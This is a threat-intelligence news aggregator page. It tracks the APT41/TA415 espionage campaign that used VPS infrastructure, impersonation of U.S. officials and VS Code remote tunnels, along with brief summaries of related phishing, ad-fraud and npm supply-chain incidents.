CyberHappenings logo
☰

Track cybersecurity events as they unfold. Sourced timelines, daily updates. Fast, privacy‑respecting. No ads, no tracking.

Threat Actors Exploit VPS Infrastructure for SaaS Account Compromises

First reported
Last updated
πŸ“° 3 unique sources, 5 articles

Summary

Hide β–²

Threat actors, including the China-linked APT41 group and the newly identified TA415, are exploiting commercial virtual private server (VPS) infrastructure to quickly and stealthily set up attack infrastructure. This tactic has been observed in coordinated SaaS account compromises across multiple customer environments and in targeted cyber espionage campaigns against U.S. trade officials. The abuse of VPS services allows attackers to bypass geolocation-based defenses, evade IP reputation checks, and blend into legitimate behavior. The attacks involved brute-force attempts, anomalous logins, phishing campaign-related inbox rule creation, and impersonation tactics. In notable incidents, attackers successfully compromised accounts by exploiting VPS services from providers such as Hyonix, Host Universal, Mevspace, and Hivelocity. The attackers deleted phishing emails and created obfuscated email rules to conceal their activities. The use of VPS infrastructure enables attackers to rapidly deploy infrastructure, making it difficult for defenders to track and respond to threats. The impersonation of U.S. Rep. John Moolenaar was part of a larger espionage campaign targeting U.S. trade officials. The campaign involved spear-phishing attacks impersonating a U.S. Congressman to gain unauthorized access to systems and sensitive information. The attacks exploited developer tools to create hidden pathways and siphon data to attacker-controlled servers. In July and August 2025, the attacks attempted to establish a Visual Studio (VS Code) remote tunnel for persistent remote access to the compromised environments, instead of relying on conventional malware. The threat actor sent email messages spoofing the US-China Business Council, allegedly inviting the recipients to a closed-door briefing regarding the United States’ affairs with China and Taiwan. Subsequent emails impersonated John Moolenaar, the Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party, requesting feedback on draft legislation regarding sanctions against China. The phishing messages contained links to password-protected archives hosted on known cloud services, containing a shortcut (LNK) file and a hidden subfolder. Launching the LNK file executed a batch script stored in the hidden folder and a decoy PDF file hosted on OneDrive. The script’s execution triggers a multi-stage infection process in which the VSCode Command Line Interface (CLI) is downloaded from Microsoft’s servers, a scheduled task is created for persistence, and a VS Code remote tunnel authenticated via GitHub is established. The script also collects system information and the contents of various user directories and sends it to the attackers. In recent attacks, the script also sends a VS Code remote tunnel verification code that the threat actor then uses to access the victim’s computer remotely and execute arbitrary commands using the system’s built-in Visual Studio terminal.

Timeline

  1. 17.09.2025 15:59 πŸ“° 1 articles Β· ⏱ 5h ago

    APT41 Operates from Chengdu, China, with Contractor Ties

    TA415 operates out of Chengdu, China, as a private government contractor under the company name Chengdu 404 Network Technology, and has ties to other private contractors, including i-Soon.

    Show sources
  2. 17.09.2025 15:56 πŸ“° 1 articles Β· ⏱ 5h ago

    TA415 Conducts Spear-Phishing Campaigns Using U.S.-China Economic Lures

    The TA415 threat actor, associated with APT41 and Brass Typhoon, has been targeting U.S. government entities, think tanks, and academic organizations using U.S.-China economic-themed lures in their spear-phishing campaigns. The group impersonated the Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party, as well as the U.S.-China Business Council, to target a range of individuals and organizations predominantly focused on U.S.-China relations, trade, and economic policy. The group relied on the Cloudflare WARP VPN service to obfuscate the source of their activity. The phishing emails contained links to password-protected archives hosted on public cloud sharing services such as Zoho WorkDrive, Dropbox, and OpenDrive. The LNK file executed a batch script and displayed a decoy PDF document. The batch script executed an obfuscated Python loader named WhirlCoil and set up a scheduled task to run the loader every two hours for persistence. The Python loader established a Visual Studio Code remote tunnel for persistent backdoor access and harvested system information and the contents of various user directories. The harvested data and the remote tunnel verification code were sent to a free request logging service.

    Show sources
  3. 10.09.2025 19:44 πŸ“° 2 articles Β· ⏱ 7d ago

    APT41 Exploits Developer Tools in Cyber Espionage Campaign

    APT41 is known for targeting diverse sectors and geographies for cyber espionage, including logistics, utilities, healthcare, high-tech, and telecommunications. The group has been active since at least 2012 and has been involved in both espionage and financially motivated activities. APT41 has used software supply chain compromises, bootkits, and compromised digital certificates in their operations. The group has targeted the video game industry for personal gain, contributing to the development of tactics used in their espionage operations. The TA415 threat actor, associated with APT41 and Brass Typhoon, has been targeting U.S. government entities, think tanks, and academic organizations using U.S.-China economic-themed lures in their spear-phishing campaigns. The group impersonated key figures and organizations to gain unauthorized access to sensitive information. The attacks involved sophisticated techniques, including the use of Visual Studio Code remote tunnels for persistent access and data exfiltration. The article also highlights the use of public cloud services and obfuscation techniques to evade detection.

    Show sources
  4. 10.09.2025 12:53 πŸ“° 3 articles Β· ⏱ 7d ago

    APT41 Targets U.S. Trade Officials in Ongoing Cyber Espionage Campaigns

    The FBI is investigating the ongoing cyber espionage campaign targeting U.S. trade officials. The campaign involved spear-phishing attacks impersonating a U.S. Congressman to gain unauthorized access to systems and sensitive information. The attacks exploited developer tools to create hidden pathways and siphon data to attacker-controlled servers. The TA415 threat actor, associated with APT41 and Brass Typhoon, has been targeting U.S. government entities, think tanks, and academic organizations using U.S.-China economic-themed lures in their spear-phishing campaigns. The group impersonated key figures and organizations to gain unauthorized access to sensitive information. The attacks involved sophisticated techniques, including the use of Visual Studio Code remote tunnels for persistent access and data exfiltration. The article also highlights the use of public cloud services and obfuscation techniques to evade detection.

    Show sources
  5. 21.08.2025 20:42 πŸ“° 5 articles Β· ⏱ 27d ago

    VPS Infrastructure Abuse Detected in May 2025 SaaS Account Compromises

    The attacks are believed to be part of a broader campaign involving impersonation tactics and targeting of U.S. trade officials, with the involvement of the China-linked APT41 group. The impersonation of U.S. Rep. John Moolenaar was part of a larger espionage campaign targeting U.S. trade officials. The campaign involved spear-phishing attacks impersonating a U.S. Congressman to gain unauthorized access to systems and sensitive information. The attacks exploited developer tools to create hidden pathways and siphon data to attacker-controlled servers. In July and August 2025, the attacks attempted to establish a Visual Studio (VS Code) remote tunnel for persistent remote access to the compromised environments, instead of relying on conventional malware. The threat actor sent email messages spoofing the US-China Business Council, allegedly inviting the recipients to a closed-door briefing regarding the United States’ affairs with China and Taiwan. Subsequent emails impersonated John Moolenaar, the Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party, requesting feedback on draft legislation regarding sanctions against China. The phishing messages contained links to password-protected archives hosted on known cloud services, containing a shortcut (LNK) file and a hidden subfolder. Launching the LNK file executed a batch script stored in the hidden folder and a decoy PDF file hosted on OneDrive. The script’s execution triggers a multi-stage infection process in which the VSCode Command Line Interface (CLI) is downloaded from Microsoft’s servers, a scheduled task is created for persistence, and a VS Code remote tunnel authenticated via GitHub is established. The script also collects system information and the contents of various user directories and sends it to the attackers. In recent attacks, the script also sends a VS Code remote tunnel verification code that the threat actor then uses to access the victim’s computer remotely and execute arbitrary commands using the system’s built-in Visual Studio terminal. The threat actor, TA415, used U.S.-China economic-themed lures in their spear-phishing campaigns. The group impersonated the Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party, as well as the U.S.-China Business Council, to target a range of individuals and organizations predominantly focused on U.S.-China relations, trade, and economic policy. The group relied on the Cloudflare WARP VPN service to obfuscate the source of their activity. The phishing emails contained links to password-protected archives hosted on public cloud sharing services such as Zoho WorkDrive, Dropbox, and OpenDrive. The LNK file executed a batch script and displayed a decoy PDF document. The batch script executed an obfuscated Python loader named WhirlCoil and set up a scheduled task to run the loader every two hours for persistence. The Python loader established a Visual Studio Code remote tunnel for persistent backdoor access and harvested system information and the contents of various user directories. The harvested data and the remote tunnel verification code were sent to a free request logging service.

    Show sources

Information Snippets

Similar Happenings

RaccoonO365 Phishing-as-a-Service Infrastructure Disrupted

Microsoft and Cloudflare disrupted the RaccoonO365 phishing-as-a-service (PhaaS) network, seizing 338 domains used by the threat group Storm-2246. The operation targeted over 5,000 Microsoft 365 credentials from 94 countries since July 2024. The group, led by Joshua Ogundipe, used Cloudflare services to protect phishing pages, making detection more challenging. The disruption began on September 2, 2025, and involved banning domains, placing warning pages, and terminating associated scripts. The group targeted over 2,300 organizations in the U.S., including healthcare entities, and offered AI-powered services to enhance phishing attacks. The stolen credentials, cookies, and other data were used in financial fraud attempts, extortion attacks, or as initial access to other victims' systems. RaccoonO365 phishing emails are often a precursor to malware and ransomware, which have severe consequences for hospitals.

SlopAds Fraud Ring Exploits 224 Android Apps to Drive 2.3 Billion Daily Ad Bids

A fraudulent ad operation, SlopAds, has been identified, exploiting 224 Android apps to generate 2.3 billion ad bids daily. The apps, collectively downloaded 38 million times across 228 countries, use steganography and hidden WebViews to create fraudulent ad impressions and clicks. The operation was disrupted after Google removed the offending apps from the Play Store. The SlopAds campaign is notable for its sophisticated tactics, including conditional fraud execution and the use of AI-themed services for command and control. The fraudulent behavior is triggered only when apps are downloaded via ad clicks, making detection more challenging. The campaign's infrastructure includes multiple domains and a complex feedback loop designed to evade security researchers. The campaign's highest concentration of ad impressions originated from the United States (30%), followed by India (10%) and Brazil (7%).

FileFix Attack Using Steganography to Deploy StealC Infostealer

A new FileFix social engineering campaign impersonates Meta account suspension warnings to trick users into installing the StealC infostealer malware. The attack uses steganography to hide malicious scripts and executables within a JPG image. The campaign targets various credentials, cryptocurrency wallets, and cloud services. The FileFix technique abuses the File Explorer address bar to execute PowerShell commands, bypassing traditional detection methods. The attack was discovered by Acronis and observed over a two-week period, with multiple variants using different payloads and domains. The StealC malware aims to steal sensitive information from infected devices, including browser credentials, messaging app data, and cryptocurrency wallets. The FileFix technique was created by red team researcher mr.d0x and has been previously used by the Interlock ransomware gang. The attack uses a multilingual phishing site to trick users into copying and pasting a malicious command into the File Explorer address bar. The campaign abuses Bitbucket repositories to host malicious components, leveraging trust in the platform to bypass detection. The FileFix campaign is the most widespread, customized, and sophisticated to date, targeting users in over 16 countries. The phishing site has been translated into at least 16 different languages. The attack chain involves a phishing email impersonating Facebook security, warning users of account suspension. The attack uses AI-generated images in the steganography process. The FileFix technique is more elegant and less suspicious than ClickFix, using File Explorer instead of the Run dialog. The FileFix attack offers a broader range of high-value targets due to its use of File Explorer. Security researcher Eliad Kimhy predicts an increase in FileFix attacks in the near future. The FileFix attack involves a fake Cloudflare Turnstile verification page that redirects users to a Windows File Explorer search query. The attack uses a Windows shortcut LNK file disguised as a PDF to initiate the infection chain. The LNK file downloads a legitimate AnyDesk installer and a malicious MSI package that installs MetaStealer. The MSI package contains a DLL and a CAB archive with malicious files, including a MetaStealer dropper. The MetaStealer dropper is protected with Private EXE Protector and is designed to steal cryptocurrency wallets. The attack leverages the Windows search protocol to redirect users to an attacker-controlled SMB share. The FileFix attack has evolved to include a more sophisticated infection chain that bypasses traditional detection methods. The attack uses a multi-stage process involving Windows File Explorer, a fake PDF lure, and an MSI package to deploy MetaStealer. The FileFix attack has been observed to use a combination of social engineering and advanced technical techniques to evade detection.

Supply Chain Attack Targeting npm Registry Compromises 40 Packages

A supply chain attack targeting the npm registry has compromised over 700 packages maintained by multiple developers. The attack uses a malicious script (bundle.js) to steal credentials from developer machines. The compromised packages include various npm modules used in different projects. The attack is capable of targeting both Windows and Linux systems. The malicious script scans for secrets using TruffleHog's credential scanner and transmits them to an external server controlled by the attackers. Developers are advised to audit their environments and rotate credentials if the affected packages are present.

VoidProxy phishing service targets Microsoft 365 and Google accounts

A new phishing-as-a-service (PhaaS) platform, VoidProxy, targets Microsoft 365 and Google accounts, including those protected by third-party SSO providers like Okta. The platform uses adversary-in-the-middle (AitM) tactics to steal credentials, multi-factor authentication (MFA) codes, and session cookies in real-time. The attack begins with emails from compromised accounts at email service providers, directing recipients to phishing sites through multiple redirections. The malicious sites are hosted on disposable domains protected by Cloudflare. VoidProxy's AitM tactics allow it to intercept and relay traffic between the victim and legitimate services, capturing sensitive information. Users with phishing-resistant authentications like Okta FastPass are protected from these attacks. The platform was discovered by Okta Threat Intelligence researchers, who describe it as scalable, evasive, and sophisticated.